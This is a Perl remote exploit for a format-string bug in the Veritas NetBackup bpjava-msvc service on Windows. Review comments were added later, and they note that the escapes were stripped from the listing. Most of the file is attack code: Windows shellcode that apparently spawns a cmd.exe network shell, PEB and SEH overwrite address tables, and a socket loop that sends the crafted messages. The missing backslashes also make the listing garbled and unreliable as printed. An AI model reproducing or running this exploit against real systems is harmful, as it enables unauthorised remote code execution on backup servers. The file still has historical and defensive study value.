# Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)
# Published : 2005-10-20
# Author : Kevin Finisterre
#!C:\Perl\bin\perl.exe -w
#
# Veritas Netbackup Win32 format string exploit
# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
#
# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
# For win xp sp2 we overwrote SEH
# http://www.digitalmunition.com/
#
# You may have to run this 2 times.
use IO::Socket;
use Getopt::Std; getopts('h:p:t:', our %args);
# Command-line options: -h host (the only mandatory one), -p port (defaults
# to 13722 when omitted) and -t target index (0 or 1, selecting one of the
# @fmt_array tables further down).
# NOTE(review): $host, $port and $target are never declared with `my` and the
# file does not `use strict`, so they are package globals; -w alone will not
# catch a misspelled use of these names elsewhere in the script.
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;}
if (defined($args{'t'})) { $target = $args{'t'}; }
# Banner, then the usage text when no host was given. -t is optional here;
# what an undefined $target means is noted at the target selection below.
# NOTE(review): the trailing "n"/"nn" in these literals look like "\n"
# escapes whose backslashes were lost when this listing was extracted. The
# same applies to every "xNN" and "...n" literal further down, so the strings
# exactly as printed here are not what the original script produced.
print "n-=[Remote Veritas NetBackup Format String exploit]=-nn";
print "n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-nn";
if(!defined($host)){
# One multi-line string literal; exit status 1 signals a usage error.
print "Usage:
-h <host>
-p port <default 13722>
-t target:
0 - Windows 2k/Windows XP SP0/SP1 - PEB
1 - Windows XP SP2 - SEHnn";
exit(1);
}
# Plain TCP connection to the bpjava-msvc listener on $host:$port.
# Indirect-object syntax (`new IO::Socket::INET(...)`) works, but the
# conventional form is `IO::Socket::INET->new(...)`.
my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => 'tcp');
# A failed connect is fatal; $! carries the underlying error.
$sock or die "no socket :$!";
# 970 chars in length.
# Byte string carried in the body of each "101 6" message sent by the loop
# below. It is built from 100 repetitions of the first literal followed by the
# fixed sequence of fragments concatenated underneath.
# NOTE(review): every fragment here reads as plain ASCII text such as "x90" -
# the "\x" escapes appear to have been stripped when this page was extracted,
# so the bytes this listing would actually assemble are not the ones the
# author's comments (PEB / SEH overwrite) refer to.
my $shellcode = "x90"x100;
$shellcode .=
"xebx42" .
"x56".
"x57".
"x8bx45x3c".
"x8bx54x05x78".
"x01xea" .
"x52" .
"x8bx52x20".
"x01xea".
"x31xc0".
"x31xc9".
"x41" .
"x8bx34x8a".
"x01xee".
"x31xff".
"xc1xcfx13" .
"xac" .
"x01xc7".
"x85xc0".
"x75xf6".
"x39xdf".
"x75xea".
"x5a" .
"x8bx5ax24" .
"x01xeb" .
"x66x8bx0cx4b".
"x8bx5ax1c" .
"x01xeb" .
"x8bx04x8b" .
"x01xe8" .
"x5f" .
"x5e" .
"xc3" .
"xfc" .
"x31xc0".
"x64x8bx40x30".
"x8dx78x20" .
"x8bx40x0c" .
"x8bx70x1c" .
"xad" .
"x8bx68x08".
"x89xee".
"x31xc0".
"x64x8bx40x30".
"x8bx40x0c" .
"x8bx40x1c" .
"x8bx68x08" .
"xbbx6fx5bx8bx9c".
"xe8x8fxffxffxff".
"xab" .
"xbbxe1x0fxfexb7".
"xe8x84xffxffxff".
"xab" .
"x89xf5".
"x31xc0".
"x66xb8x6cx6c".
"x50" .
"x68x33x32x2ex64".
"x68x77x73x32x5f".
"x54" .
"xbbx71xa7xe8xfe" .
"xe8x65xffxffxff" .
"xffxd0" .
"x89xef" .
"x89xc5" .
"x81xc4x70xfexffxff" .
"x54" .
"x31xc0".
"xfexc4".
"x40" .
"x50" .
"xbbx22x7dxabx7d".
"xe8x48xffxffxff".
"xffxd0" .
"x31xc0" .
"x50" .
"x50" .
"x50" .
"x50" .
"x40" .
"x50" .
"x40" .
"x50" .
"xbbxa6x55x34x79".
"xe8x32xffxffxff".
"xffxd0" .
"x89xc6" .
"x31xc0" .
"x50" .
"x50" .
"x35x02x01x70xcc".
"xfexcc" .
"x50" .
"x89xe0".
"x50" .
"x6ax10" .
"x50" .
"x56" .
"xbbx81xb4x2cxbe" .
"xe8x11xffxffxff" .
"xffxd0" .
"x31xc0" .
"x50" .
"x56" .
"xbbxd3xfax58x9b" .
"xe8x01xffxffxff" .
"xffxd0" .
"x58" .
"x60" .
"x6ax10".
"x54" .
"x50" .
"x56" .
"xbbx47xf3x56xc6".
"xe8xeexfexffxff".
"xffxd0" .
"x89xc6" .
"x31xdb" .
"x53" .
"x68x2ex63x6dx64".
"x89xe1" .
"x41" .
"x31xdb".
"x56" .
"x56" .
"x56" .
"x53" .
"x53" .
"x31xc0".
"xfexc4".
"x40" .
"x50" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x6ax44".
"x89xe0".
"x53" .
"x53" .
"x53" .
"x53" .
"x54" .
"x50" .
"x53" .
"x53" .
"x53" .
"x43" .
"x53" .
"x4b" .
"x53" .
"x53" .
"x51" .
"x53" .
"x87xfd" .
"xbbx21xd0x05xd0".
"xe8xa8xfexffxff".
"xffxd0" .
"x5b" .
"x31xc0".
"x48" .
"x50" .
"x53" .
"xbbx43xcbx8dx5f".
"xe8x96xfexffxff".
"xffxd0" .
"x56" .
"x87xef".
"xbbx12x6bx6dxd0".
"xe8x87xfexffxff".
"xffxd0" .
"x83xc4x5c" .
"x61" .
"xebx81";
#/*
#7FFDF250 54 PUSH ESP
#7FFDF251 5F POP EDI
#7FFDF252 B8 90909090 MOV EAX,90909090
#7FFDF257 FD STD
#7FFDF258 F2:AF REPNE SCAS DWORD PTR ES:[EDI]
#7FFDF25A 57 PUSH EDI
#7FFDF25B C3 RETN
#
#and
#
#overwrite the FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250
#
#7FFDF020 7FFDF250
#
#*/
# NOTE(review): "$targetn" interpolates a variable named $targetn (undefined),
# not $target followed by "n" - another symptom of the stripped "\n" escapes.
print "TARGET IS $targetn";
# Per-target write tables, consumed in pairs by the send loop below.
# Row 0: the addresses the %hn directives write to (packed as 32-bit values
# into the message). Row 1: the 16-bit value written to the matching address.
# $c is the number of entries in each row, so $c/2 messages are sent.
# Every entry is an absolute address for one exact OS/service-pack build,
# which is why each target needs its own table.
# NOTE(review): $target is never declared or range-checked. With -t omitted
# it is undef, which compares == 0 (with an "uninitialized" warning under
# -w), so target 0 is the effective default. Any value other than 0 or 1
# leaves $c and @fmt_array unset, and the send loop below then runs zero
# times without any message to the user.
if ($target == 0) {
$c = 8;
@fmt_array = (
#WINDOWS 2K SP4/XP SP0-SP1
#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection
[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ],
[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ],
);
}
if ($target == 1) {
$c = 10;
@fmt_array = (
#windows XP SP2
#OVERWRITE STATIC SEH FRAME
[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ],
[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ],
);
}
my $offset = 0;
my $dump_fmt=6; #amount of %.8x needed to reach stackbase
my $payload;
my $payload2;
my $hi;
my $lo;
my $last = 0;
my $flag = 2;
my @shift;
# NOTE(review): $offset, $last, $flag and @shift are declared but never used
# again anywhere in this script; they look like leftovers from development.
#
# Send loop: one round per address/value pair in @fmt_array ($y advances by
# two). Each round writes two messages on the same connection - a "118 1"
# message, then a "101 6" message whose body holds the format string
# ($payload), $shellcode, and the two target addresses ($payload2) - and
# echoes two response lines to stdout after each. None of the print calls
# or socket reads are checked; at EOF `<$sock>` yields undef and the print
# only emits a warning.
#
# From the defender's side, the run of %08x followed by %<width>x%hn pairs
# inside a "101 6" message body on the bpjava-msvc port (13722 by default)
# is the distinctive on-the-wire artefact of this technique.
for (my $y = 0; $y < $c; $y = $y + 2)
{
# $dump_fmt copies of %08x consume argument slots until, per the author's
# comment above, the stack base is reached; the two %hn directives then
# each store a 16-bit count at the address found in the next slot.
$payload = "%08x" x $dump_fmt;
# The two 32-bit target addresses (native byte order via pack 'l') with a
# 4-byte spacer between them.
$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]);
# Field widths for the two %hn writes. %n records the cumulative number of
# characters emitted so far, so $lo is expressed relative to $hi; the
# subtracted constants presumably account for the fixed text emitted before
# each directive - not re-derived here.
$hi = $fmt_array[1][$y] - 0x2a - 35;
$lo = $fmt_array[1][$y+1] - $hi - 77;
$payload .= "%$hi" . "x%hn%$lo" . "x%hn";
print $sock " 118 1nSNO space fillern";
print scalar <$sock>;
print scalar <$sock>;
# NOTE(review): "$shellcoden" interpolates a variable named $shellcoden,
# not $shellcode - the "\n" escape lost its backslash in this listing.
print $sock " 101 6n" .
"$payload" . "n" . # You must finish the line off with a line feed.
"dummy spacen" .
"$shellcoden" .
"$payload2" . "n" .
"spare bitsn" .
"spare bitsnn";
print scalar <$sock>;
print scalar <$sock>;
}
if ($target == 1)
{
#create exception so SEH is called
# SEH target only: after the loop above has done its writes, one more
# "118 1" / "101 6" exchange is sent whose format string is a bare %n. That
# is a write through whatever pointer occupies the first argument slot,
# intended to fault so that the overwritten SEH frame is dispatched. The
# address slot used by the loop ($payload2) is replaced with twelve "A"s
# here, and $shellcode is sent again; "$shellcoden" has the same stripped
# "\n" escape as in the loop.
print $sock " 118 1nSNO space fillern";
print scalar <$sock>;
print scalar <$sock>;
print $sock " 101 6n" .
"%n" . "n" . # You must finish the line off with a line feed.
"dummy spacen" .
"$shellcoden" .
"AAAAAAAAAAAA" . "n" .
"spare bitsn" .
"spare bitsnn";
print scalar <$sock>;
print scalar <$sock>;
}
# The close result is not checked; nothing further is written, so a
# buffered-write error here would go unreported but would not change the
# outcome of the preceding exchange.
close $sock;